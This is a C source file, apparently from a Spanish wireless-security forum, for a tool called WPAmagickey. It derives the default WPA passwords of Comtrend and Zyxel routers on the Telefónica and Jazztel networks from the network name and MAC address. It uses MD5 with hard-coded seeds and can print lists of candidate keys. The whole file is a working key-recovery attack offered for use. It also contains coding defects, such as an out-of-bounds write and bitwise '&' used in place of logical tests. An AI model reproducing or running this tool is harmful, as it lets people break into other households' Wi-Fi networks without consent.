/*******************************************************************************
* Fichero:	WPAmagickey.c
* Autor:	www.seguridadwireless.net
* Algoritmo:	Dudux && Mambostar
* Coder:	Niroz&Me|on
* Fecha:	25-11-2010
* 
*
* 
* Descripcion:	Calcula la contraseña WiFi por defecto de una red WLAN_XXXX o 
*		Jaxxtell_XXXX (WPA). Routers Comtrend (Telefonik & JazzTel) y
*		Zyxel.
*
* 
* Reutilizando codigo de wlandecrypter v1.3.x
* 
* 
* Este programa es software libre; puedes redistribuirlo y/o modificarlo
* bajo los terminos de la Licencia Publica General GNU (GPL) publicada
* por la Free Software Foundation en su version numero 2.
* Mira http://www.fsf.org/copyleft/gpl.txt.
*
* Lo anterior quiere decir que si modificas y/o redistribuyes este codigo o 
* partes del mismo debes hacerlo bajo las mismas condiciones anteriores, 
* incluyendo el codigo fuente modificado y citando a los autores originales.
* 
* Este programa se distribuye SIN GARANTIA de ningun tipo. USALO BAJO TU PROPIO
* RIESGO.
*
* 
* Mas informacion en foro.seguridadwireless.net
*
* v0.0.1: Primera versión de prueba
* v0.0.2: Añade essid Jazztel (25/11/2010)
* v0.1.0: Añade opcion para Essid cambiado (27/11/2010)
* v0.2.0: Añade router Zyxel (15/12/2010)
* v0.2.1: Añade la mac 00:1A:2B (2011/09/01)
*******************************************************************************/

//#include <ctype.h>
//#include <stdio.h>
//#include <stdlib.h>
#include <string.h>
#include <openssl/evp.h>

#define VERSION 0
#define SUBVERSION 2
#define RELEASE 1
#define DATEVERSION "2011/09/01"


//---------------------------
// Variables globales
//---------------------------

FILE *fichero;

char SW[35]="[http://www.seguridadwireless.net]\0";
char appName[12]="WPAmagickey\0";

//------------------------------------------------------------------------------
// Funcion: salirError
// Centraliza mensajes de error y realiza salida controlada
//   Acentos eliminados intencionadamente para no tener
//   que gestionar codificación UTF-8 o ISO-8859-1
//------------------------------------------------------------------------------
void salirError (int errnum)
{
 char *errmsg[9];

 errmsg[0]="Numero invalido de parametros";
 errmsg[1]="Opcion no reconocida";
 errmsg[2]="ESSID no especificado";
 errmsg[3]="ESSID invalido: Se espera WLAN_XXXX, Jazztel_XXXX o NoEssid";
 errmsg[4]="BSSID no especificado";
 errmsg[5]="BSSID invalido: Se espera formato XX:XX:XX:XX:XX:XX";
 errmsg[7]="Error al abrir o crear el fichero";
 errmsg[8]="No implementado aún";
 if (fichero != NULL) fclose(fichero);
 fprintf(stderr," \033[31m[-Error]\033[0m %s\n\n",errmsg[errnum]);
 exit(errnum);
}

//------------------------------------------------------------------------------
// Funcion: muestraVersion
// Muestra la versión del programa
//------------------------------------------------------------------------------
void muestraVersion(void)
{
 fprintf(stdout, "\n%s v%i.%i.%i (%s) %s\n\n",appName,VERSION,SUBVERSION,RELEASE,DATEVERSION,SW);
}

//------------------------------------------------------------------------------
// Funcion: muestraUso
// Muestra las opciones de uso del programa
//------------------------------------------------------------------------------
void muestraUso(void)
{
 fprintf(stdout, " Algoritmo Dudu@seguridadwireless.net && Mambostar. Coder: NirozMe|on\n\n");
 fprintf(stdout, " uso: WPAmagickey <ESSID> <BSSID> [fichero]\n\n");
 fprintf(stdout, " <ESSID> = NOESSID para Essid cambiado\n\n");
 fprintf(stdout, " ejemplo: WPAmagickey wlan_XXXX XX:XX:XX:XX:XX:XX\n");
 fprintf(stdout, " ejemplo: WPAmagickey jazztel_1234 aa:bb:cc:dd:ee:ff dicci\n\n");
}

//------------------------------------------------------------------------------
// Función: compruebaEssid
// Comprueba que el ESSID concuerde con patron WLAN_XXXX, Jazztel_XXXX o NoEssid
//------------------------------------------------------------------------------
void compruebaEssid (char *essid)
{
 unsigned int i;
	
 if (strlen(essid) != 9 & strlen(essid) != 12 & strlen(essid) != 7) salirError(3);
	
 for (i=0;i<strlen(essid);i++) essid[i]=toupper(essid[i]);

 if (strlen(essid) == 9 & strncmp("WLAN_", essid, 5) != 0) salirError(3);
 if (strlen(essid) == 12 & strncmp("JAZZTEL_", essid, 8) != 0) salirError(3);
 if (strlen(essid) == 7 & strncmp("NOESSID", essid, 7) != 0) salirError(3);

 if (strncmp("W", essid, 1) == 0)	i=5;
 if (strncmp("J", essid, 1) == 0)	i=8;

 if (strncmp("NOESSID", essid, 7) != 0){
 	for (i;i<strlen(essid);i++)
		if (!isxdigit(essid[i]))	salirError(3);
  }
}

//------------------------------------------------------------------------------
// Función: compruebaBssid
// Comprueba que el BSSID concuerde con patron XX:XX:XX:XX:XX:XX
//------------------------------------------------------------------------------
void compruebaBssid (char *bssid)
{
 unsigned int i;

 if (strlen(bssid) != 17) salirError(5);

 for (i=0;i<strlen(bssid);i++) bssid[i]=toupper(bssid[i]);
 
 for (i=0;i<5;i++) if (bssid[i*3+2]!=':') salirError(5);

 for (i=0;i<6;i++) if (!isxdigit(bssid[i*3]) || !isxdigit(bssid[i*3+1])) salirError(5);
}

//------------------------------------------------------------------------------
// Funcion: calculaHash
// Calcula Hash MD5 del que se obtiene la clave WiFi
//------------------------------------------------------------------------------
unsigned char *calculaHash(char *algoritmo, char *buffer, unsigned int len, int *outlen)
{
 EVP_MD *m;
 EVP_MD_CTX ctx;
	
 unsigned char *hash;
	
 OpenSSL_add_all_digests ();
	
 if (!(m = (EVP_MD*) EVP_get_digestbyname(algoritmo))) return NULL;
	
 if (!(hash = (unsigned char *) malloc(EVP_MAX_MD_SIZE))) return NULL;
	
 EVP_DigestInit(&ctx, m);
 EVP_DigestUpdate(&ctx, buffer, len);
 EVP_DigestFinal(&ctx, hash, outlen);
	
 return hash;
}

//------------------------------------------------------------------------------
// Funcion: montaSemilla
// Prepara cadena a la que calcular el Hash MD5 para obtener la clave
//------------------------------------------------------------------------------
void montaSemilla (char *semilla,char *semilla2, char *essid, char *bssid, int resta, int zyxel)
{
	char bssid1[13], bssid2[13];
	int i, j=0;
//	char noessid[5]="0000\0";
//	long int x;	
	char noessid[9]="00000000\0";
	int x;
	
	char essid2[5]="0000\0";
	bssid1[12]='\0';
	bssid2[12]='\0';
	
	for (i=0;i<6;i++)	// elimina los : de la bssid
	 {	
		bssid2[j]   = bssid[i*3];
		bssid2[j+1] = bssid[i*3+1];
		j = j+2;
	 }	

	strcpy(bssid1,bssid2);

	if (strncmp("NOESSID", essid, 7) == 0)
	{
		// for (i=8;i<12;i++)	noessid[i-8]=bssid1[i];	// copia ultimas 4 cifras mac
          for (i=8;i<12;i++)	noessid[i-4]=bssid1[i];	// copia ultimas 4 cifras mac

		x = strtol(noessid,NULL,16);

		x = x-resta;

		// sprintf (noessid, "%04X",(unsigned int)x);
          sprintf (noessid, "%08X",x);
		
		// for (i=2;i<4;i++)	bssid1[i+8]=noessid[i];	// 2 ultimas cifras mac
           for (i=6;i<8;i++)	bssid1[i+4]=noessid[i];	// 2 ultimas cifras mac
	}
	else {
		if (strncmp("W", essid, 1) == 0)	
		{
			i=5;
			for (i;i<strlen(essid);i++){	bssid1[i+3]=essid[i];essid2[i-5]=essid[i];}
		}
		
		if (strncmp("J", essid, 1) == 0)	
		{
			i=8;
			for (i;i<strlen(essid);i++){	bssid1[i]=essid[i];essid2[i-8]=essid[i];}
		}
	}
       
	if (zyxel==0) {
		strcat(semilla,bssid1);
		
		strcpy(semilla2,bssid2);
                

		
	}
        
        
	else if(zyxel==1) {
		semilla[0]='\0';
		for (i=0;i<strlen(bssid1);i++) bssid1[i]=tolower(bssid1[i]);
		strcat(semilla,bssid1);//magicdudux
		semilla2[0]='\0';
	}
else if(zyxel==2){strcat(semilla,"64680C");

strcpy(semilla2,essid2);
strcat(semilla2,bssid2);
}
}

//------------------------------------------------------------------------------
// Funcion: detectRouter
// Devuelve 1 si la mac (bssid) es de un router Zyxel valido, 0 si no lo es.
//------------------------------------------------------------------------------
int detectRouter(char *bssid)
{
 if (strncmp("00:1F:A4", bssid, 8) == 0) { return 1; }
 else if(strncmp("00:1A:2B:", bssid, 8) == 0) { return 2; }
   else return 0;
}

//------------------------------------------------------------------------------
// Funcion: muestraPass
// Escribe la clave en pantalla y/o fichero
//------------------------------------------------------------------------------
void creaPass(unsigned char *semilla,unsigned char *semilla2, FILE *fichero, int zyxel)
{
 int i,outlen;
 char*  clave;
 char magicdudux[33];
 char XX[2];XX[2]='\0';
 if (zyxel==0) {
    strcpy(magicdudux,semilla);
    strcat(magicdudux,semilla2);
    clave = calculaHash("md5", magicdudux, strlen(magicdudux), &outlen);
 	  for(i=0;i<10;i++)
	
	fprintf(fichero,"%02x",(unsigned char)(clave[i]&0xFF));
  }
  else if(zyxel==1){
    strcpy(magicdudux,semilla);
    strcat(magicdudux,semilla2);
    clave = calculaHash("md5", magicdudux, strlen(magicdudux), &outlen);
 	  for(i=0;i<10;i++)
	
	fprintf(fichero,"%02X",(unsigned char)(clave[i]&0xFF));
}
  else {
   char j,k;char charset[]="0123456789ABCDEF\0";
   for(j=0; j<=15;j++){
 	  for(k=0; k<=15;k++){
    
  	   strcpy(magicdudux,semilla);
   	   XX[0]=charset[j];
  	   XX[1]=charset[k];
  	   strcat(magicdudux,XX);
   	   strcat(magicdudux,semilla2);
    	   clave = calculaHash("md5", magicdudux, strlen(magicdudux), &outlen);
	   for(i=0;i<10;i++){
       	
     	      fprintf(fichero,"%02x",(unsigned char)(clave[i]&0xFF));}

      	   fprintf(fichero,"\n");
}

}fprintf(fichero,"\n");
  
}
}	
 //












//------------------------------------------------------------------------------
// Programa principal
//------------------------------------------------------------------------------
int main(int argc, char *argv[])
{
	char magicdudux[33]="bcgbghgg\0";
        char	semilla2[13];
	int  resta =0, zyxel=0;
	char *clave;

	muestraVersion();
	
	if (argc < 3 || argc > 4)
	{
	  muestraUso();
	  salirError(0);
	  return 0;
	}

	compruebaEssid (argv[1]);
	compruebaBssid (argv[2]);

	fprintf(stdout,"Essid: %s - Bssid: %s \n\n", argv[1], argv[2]);

	zyxel = detectRouter(argv[2]);

	montaSemilla(magicdudux,semilla2, argv[1], argv[2], resta, zyxel);

	if (argc == 4)
	{
		fichero = fopen(argv[3],"w");
		if (fichero == NULL) salirError(7);
		fprintf(stdout,"[+] Generando fichero de clave: %s\n\n", argv[3]);
		//fprintf(stdout,"\n%s v%i.%i.%i %s\n\n",appName,VERSION,SUBVERSION,RELEASE,SW);
		//fprintf(stdout,"Essid: %s - Bssid: %s \n\n", argv[1], argv[2]);

		if (strncmp("NOESSID", argv[1], 7) == 0)
		{ if (zyxel!=2){
		   for (resta=1;resta<4;resta=resta+2)
		   {	
			magicdudux[8]='\0';
			montaSemilla(magicdudux,semilla2, argv[1], argv[2], resta, zyxel);
			
			creaPass(magicdudux,semilla2,fichero,zyxel);
			fprintf(stdout,"Clave/s:\n");
			creaPass(magicdudux,semilla2,stdout,zyxel);
		   }
		  }else salirError(8);
		}
		else{
			
			
			
   			creaPass(magicdudux,semilla2,fichero,zyxel);
			fprintf(stdout," Clave/s: \n");
			creaPass(magicdudux,semilla2,stdout,zyxel);
		}
	
		fclose(fichero);
		fprintf(stdout,"[+] Fichero guardado OK\n\n");
	}
	else
	{
		if (strncmp("NOESSID", argv[1], 7) == 0) 
		{  if(zyxel!=2){
		   for (resta=1;resta<4;resta=resta+2)
		   {	
			magicdudux[8]='\0';
			montaSemilla(magicdudux,semilla2, argv[1], argv[2], resta, zyxel);
			
			fprintf(stdout,"Clave/s:\n");
			
			creaPass(magicdudux,semilla2,stdout,zyxel);
		   }
                  }else salirError(8);

		}
		else{
			
			fprintf(stdout,"Clave/s:\n");
			
			creaPass(magicdudux,semilla2,stdout,zyxel);
			
		}
	}
printf("\n");
 return 0;
}
//------------------------------------------------------------------------------ EoF
